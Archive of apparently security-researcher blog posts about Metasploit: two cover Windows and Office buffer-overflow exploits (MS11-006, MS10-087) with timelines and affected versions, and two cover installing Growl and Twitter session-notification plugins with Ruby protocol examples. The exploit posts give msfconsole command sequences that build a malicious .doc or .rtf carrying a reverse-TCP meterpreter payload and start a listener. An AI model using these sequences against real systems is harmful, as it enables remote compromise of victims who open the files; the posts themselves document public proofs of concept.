Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow

Timeline :

Vulnerability disclosed by Moti & Xu Hao on POC2010 the 2010-12-15
CVE registered the 2010-12-22
PoC provided by Metasploit team the 2011-01-04

    PoC provided by :

Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck

    Reference(s) :

CVE-2010-3970
MSA-2490606
MS11-006

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

    Tested on Windows XP SP3

    Description :

Microsoft is once more the victim of an uncoordinated vulnerability disclosure. Moti Joseph & Xu Hao, two security researchers, revealed a new Microsoft Windows vulnerability on 15 December during the POC2010 conference. The disclosure drew no attention until December 22 (CVE-2010-3970), even though the POC2010 conference schedule had clearly indicated that a new Microsoft Windows vulnerability would be revealed. Perhaps this lack of attention is because the conference was held in South Korea?

Again, shortly thereafter, the information on this vulnerability circulated quickly among computer security professionals, culminating today in a public PoC provided by the Metasploit team. The presentation given by Moti Joseph & Xu Hao during the POC2010 conference is also available on Exploit-DB.
This vulnerability, which can be classified as critical, is fairly simple to exploit. When viewing the content of a directory containing a forged Word or PowerPoint document in “Thumbnails” mode, arbitrary code can be executed with the privileges of the local user. Exploitation of this vulnerability is also possible through SharePoint.

A few hours after the release of the Metasploit PoC, Microsoft issued an advisory, MSA-2490606, listing the vulnerable systems and providing mitigations. Microsoft does not currently plan to provide an out-of-band patch for this vulnerability.

What is also interesting in the disclosure life cycle of this vulnerability is that the conference was announced on September 13, 2010, when the organizers were looking for people interested in presenting their work. The deadline for paper submission (CFP) was announced as October 15, 2010. This would mean that this vulnerability had been known well before October 15, 2010. It is also worth noting that Microsoft was a sponsor of this conference.

    Commands :

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

Growl Metasploit Plugin on Ubuntu

The Growl Metasploit plugin was developed in Ruby by Carlos Perez, aka Dark Operator. This plugin lets you send a Growl notification to your Mac OS X machine when a Metasploit session is created or shut down. Each notification contains information about the related session.

Installation :

To install the Growl Metasploit plugin, you first need to update RubyGems with the following commands (thanks to Carlos for helping me update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then install the Growl gem needed by the plugin.

sudo gem install ruby-growl

After this, just download the growl.rb script from Github and install it in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/”.

Don’t forget to set the right permissions on the script, then launch Metasploit.

sudo msfconsole

Growl plugin setup :

To set up the Growl plugin you first need to install Growl on your Mac OS X, if you don’t have it. Then configure Growl to “Listen for incoming connections” and “Allow remote application registration”, and provide a password in the password field.

[Screenshot: Growl configuration]

Don’t forget to restart Growl after the setup. Growl communicates on 9887/UDP, so accept the incoming connection after running the Metasploit Growl plugin “growl_start” command described below.

In Metasploit, load the plugin and configure it with the following commands :

[Screenshot: Growl Metasploit plugin configuration]

The “load growl” command loads the Growl Metasploit plugin.

The “growl_set_host” command sets the IP address where Growl is running.

The “growl_set_password” command sets the Growl password used to authenticate you.

The “growl_set_sticky” command, “false” or “true”, makes the notification stick until clicked.

The “growl_set_source” command identifies the Metasploit instance that will send the notification. For example, if you have two Metasploit instances, you will be able to distinguish the source of the notification.

Just replace all the configuration settings shown in the screenshot with your own settings 🙂

Then save the configuration with the “growl_save” command :

[Screenshot: Growl Metasploit plugin configuration saving]

As you can see, all the configuration settings are saved into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file, just type the “growl_show_parms” command.

[Screenshot: Growl Metasploit Plugin configuration display]

Then, to start the Growl plugin, run the “growl_start” command.

[Screenshot: Starting Growl Metasploit Plugin]

Now, each time a new Metasploit session is created, or a session is shut down, a Growl notification will be sent to the configured Growl IP address. Here under is a demonstration video.
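As an added example, not the plugin's own code nor the ruby-growl gem's, here is the Growl UDP v1 notification the plugin's ruby-growl dependency sends to 9887/UDP, built and parsed in Ruby with the sticky flag and password from the settings above. The packet layout, the session fields and the sample values are my assumptions; the point it shows is that the password only authenticates the datagram, while the session details inside it travel in cleartext.

```ruby
require 'digest/md5'

# Growl UDP protocol v1 as assumed here (the format spoken by the ruby-growl gem
# the plugin depends on): 1-byte version, 1-byte type, big-endian 16-bit flags
# and four string lengths, the strings, then MD5(packet || password) as trailer.
# Growl listens for these datagrams on 9887/UDP.
GROWL_PROTOCOL_VERSION  = 1
GROWL_TYPE_NOTIFICATION = 1   # MD5-authenticated notification

# Build the packet the plugin would emit for one session event.
def growl_notification_packet(app, name, title, desc, password, sticky: false, priority: 0)
  flags  = (priority & 0x7) << 1   # 3-bit signed priority in bits 1..3
  flags |= 1 if sticky              # bit 0: stay on screen until clicked
  header = [GROWL_PROTOCOL_VERSION, GROWL_TYPE_NOTIFICATION, flags,
            name.bytesize, title.bytesize, desc.bytesize, app.bytesize].pack('CCnnnnn')
  body   = header + name.b + title.b + desc.b + app.b
  body + Digest::MD5.digest(body + password.to_s.b)
end

# Parse a datagram as a receiver would; nil when malformed or when the MD5 trailer
# does not match the password. Every field is readable without the password.
def parse_growl_notification(packet, password)
  return nil if packet.bytesize < 28
  version, type, flags, nlen, tlen, dlen, alen = packet.unpack('CCnnnnn')
  return nil unless version == GROWL_PROTOCOL_VERSION && type == GROWL_TYPE_NOTIFICATION
  body_len = 12 + nlen + tlen + dlen + alen
  return nil unless packet.bytesize == body_len + 16
  body, digest = packet.byteslice(0, body_len), packet.byteslice(body_len, 16)
  return nil unless Digest::MD5.digest(body + password.to_s.b) == digest
  off = 12
  name, title, desc, app = [nlen, tlen, dlen, alen].map { |l| s = body.byteslice(off, l); off += l; s }
  prio = (flags >> 1) & 0x7
  { app: app, name: name, title: title, description: desc,
    sticky: (flags & 1) == 1, priority: prio > 3 ? prio - 8 : prio }
end

# Constructed session data, shaped like the details the plugin reports.
SAMPLE_SESSION = { id: 1, type: 'meterpreter', peer: '192.0.2.10:4444', info: 'WIN-XP\\user @ WIN-XP' }

# Notification for a session "opened" / "closed" event, using the plugin's sticky setting.
def session_notification(session, event, password, sticky: false)
  title = "Metasploit session #{event}"
  desc  = "Session #{session[:id]} (#{session[:type]}) from #{session[:peer]}: #{session[:info]}"
  growl_notification_packet('Metasploit', 'Session', title, desc, password, sticky: sticky)
end

if __FILE__ == $0
  pkt = session_notification(SAMPLE_SESSION, 'opened', 'changeme', sticky: true)
  p parse_growl_notification(pkt, 'changeme')   # every field is cleartext on the wire
end
```

Sending the packet is a single `UDPSocket.new.send(pkt, 0, growl_host, 9887)`; since the content is unencrypted, keep the path between the Metasploit box and the Mac on a trusted network.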

MS10-087 : Microsoft Office RTF Parsing Stack Overflow

Timeline :

Vulnerability discovered by wushi of team509
Initial Vendor Notification by iDefense the 2009-08-12
Initial Vendor Reply to iDefense the 2009-08-12
Coordinated Public Disclosure the 2010-11-09

    PoC provided by :

wushi of team509
unknown
jduck

    Reference(s) :

CVE-2010-3333
MS10-087

    Affected version(s) :

Microsoft Office XP Service Pack 3 before KB2289169
Microsoft Office 2003 Service Pack 3 before KB2289187
Microsoft Office 2007 Service Pack 2 before KB2289158
Microsoft Office 2010 (32-bit editions) before KB2289161
Microsoft Office 2010 (64-bit editions) before KB2289161
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac before KB2476512
Microsoft Office for Mac 2011 before KB2454823
Open XML File Format Converter for Mac before KB2476511

    Tested on Windows XP SP3 with :

    Office 2003 SP3 msword.exe version 11.0.8328.0 (KB2344911 from 12 October 2010)

    Description :

This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.

    Commands :

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set FILENAME test.rtf
set OUTPUTPATH /home/eromang
show targets
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

Twitt Metasploit Plugin on Ubuntu

The Twitt Metasploit plugin was developed in Ruby by Carlos Perez, aka Dark Operator. This plugin lets you send a Twitter direct message to a configured account when a Metasploit session is created or shut down. Each message contains information about the related session.

Installation :

To install the Twitt Metasploit plugin on Ubuntu 10.04.1 LTS, you first need to update RubyGems with the following commands (thanks to Carlos for helping me update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then install the Ruby gem needed by the plugin.

sudo gem install twitter

After this, just download the twitt.rb script from Github and install it in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/”. Don’t forget to set the right permissions on the script, then launch Metasploit.

sudo msfconsole

Twitt plugin setup :

To set up the OAuth 1.0a plugin settings you first need a Twitter account, if you don’t have one. Then you need to register the Twitt application with Twitter Developers.

When you fill in the form, don’t forget to set the “Application Type” to “Client” and to give the “Client” a “Read & Write” “Default Access Type”.

[Screenshot: Twitter Developers Application Registration]

After registering the application on Twitter, you will need the following configuration settings :

  • Consumer key for the Metasploit Twitt plugin “twitt_set_consumer_key” command.
  • Consumer secret for the Metasploit Twitt plugin “twitt_set_consumer_secret” command.
  • Access Token (oauth_token) for the Metasploit Twitt plugin “twitt_set_oauth_token” command.
  • Access Token Secret (oauth_token_secret) for the Metasploit Twitt plugin “twitt_set_oauth_token_secret” command.
  • Your Twitter username account for the Metasploit Twitt plugin “twitt_set_user” command.

In Metasploit, load the plugin and configure it with the following commands :

[Screenshot: Metasploit Twitt plugin loading]
[Screenshot: Metasploit Twitt plugin configuration]

Just replace all the configuration settings shown in the screenshot with your own settings 🙂

Then save the configuration with the “twitt_save” command :

[Screenshot: Metasploit Twitt configuration saving]

As you can see, all the configuration settings are saved into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file, just type the “twitt_show_parms” command.

[Screenshot: Metasploit Twitt plugin parameters]

Then, to start the Twitt plugin, run the “twitt_start” command.

[Screenshot: Metasploit Twitt plugin starting]

Now, each time a new Metasploit session is created, or a session is shut down, a direct message will be sent to the configured Twitter account. Here under is a demonstration video.
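As an added example, not the Twitt plugin's code, here is how the four OAuth 1.0a credentials listed above (consumer key and secret, access token and secret) are used to sign one direct-message request in Ruby, per RFC 5849 HMAC-SHA1, with the credentials loaded from a constructed .yaml in the shape twitt_save would write. The YAML key names, the endpoint URL and the placeholder values are assumptions.

```ruby
require 'openssl'
require 'yaml'

# Constructed config in the shape twitt_save might write (key names assumed, not read from the plugin).
SAMPLE_TWITT_YAML = <<~YAML
  consumer_key: CONSUMER_KEY_PLACEHOLDER
  consumer_secret: CONSUMER_SECRET_PLACEHOLDER
  oauth_token: ACCESS_TOKEN_PLACEHOLDER
  oauth_token_secret: ACCESS_TOKEN_SECRET_PLACEHOLDER
  user: your_twitter_handle
YAML

# OAuth 1.0a percent-encoding (RFC 5849 3.6): unreserved chars pass, all else is %XX per byte.
def oauth_escape(s)
  s.to_s.b.gsub(/[^A-Za-z0-9\-._~]/) { |c| format('%%%02X', c.ord) }
end

# Signature base string (RFC 5849 3.4.1): METHOD & URL & sorted, encoded parameters.
def oauth_base_string(method, url, params)
  pairs = params.map { |k, v| [oauth_escape(k), oauth_escape(v)] }.sort
  [method.upcase, oauth_escape(url), oauth_escape(pairs.map { |k, v| "#{k}=#{v}" }.join('&'))].join('&')
end

# HMAC-SHA1 keyed with consumer secret & token secret (RFC 5849 3.4.2): only the signature goes on the wire.
def oauth_sign(base_string, consumer_secret, token_secret)
  key = "#{oauth_escape(consumer_secret)}&#{oauth_escape(token_secret)}"
  [OpenSSL::HMAC.digest('sha1', key, base_string)].pack('m0')
end

# Authorization header for one signed request; nonce/timestamp injected so results are reproducible.
def oauth_authorization_header(method, url, body_params, creds, nonce:, timestamp:)
  oauth = {
    'oauth_consumer_key'     => creds['consumer_key'],
    'oauth_nonce'            => nonce,
    'oauth_signature_method' => 'HMAC-SHA1',
    'oauth_timestamp'        => timestamp.to_s,
    'oauth_token'            => creds['oauth_token'],
    'oauth_version'          => '1.0'
  }
  base = oauth_base_string(method, url, oauth.merge(body_params))
  oauth['oauth_signature'] = oauth_sign(base, creds['consumer_secret'], creds['oauth_token_secret'])
  'OAuth ' + oauth.sort.map { |k, v| "#{oauth_escape(k)}=\"#{oauth_escape(v)}\"" }.join(', ')
end

if __FILE__ == $0   # the v1 direct-message endpoint of the time is assumed here
  creds = YAML.safe_load(SAMPLE_TWITT_YAML)
  puts oauth_authorization_header('POST', 'https://api.twitter.com/1/direct_messages/new.json',
                                  { 'screen_name' => creds['user'], 'text' => 'Session 1 opened' },
                                  creds, nonce: 'n0nce', timestamp: Time.now.to_i)
end
```

Only the signature leaves the host; the consumer secret and token secret stay in the “.yaml” file, so protect that file's permissions as you would a private key.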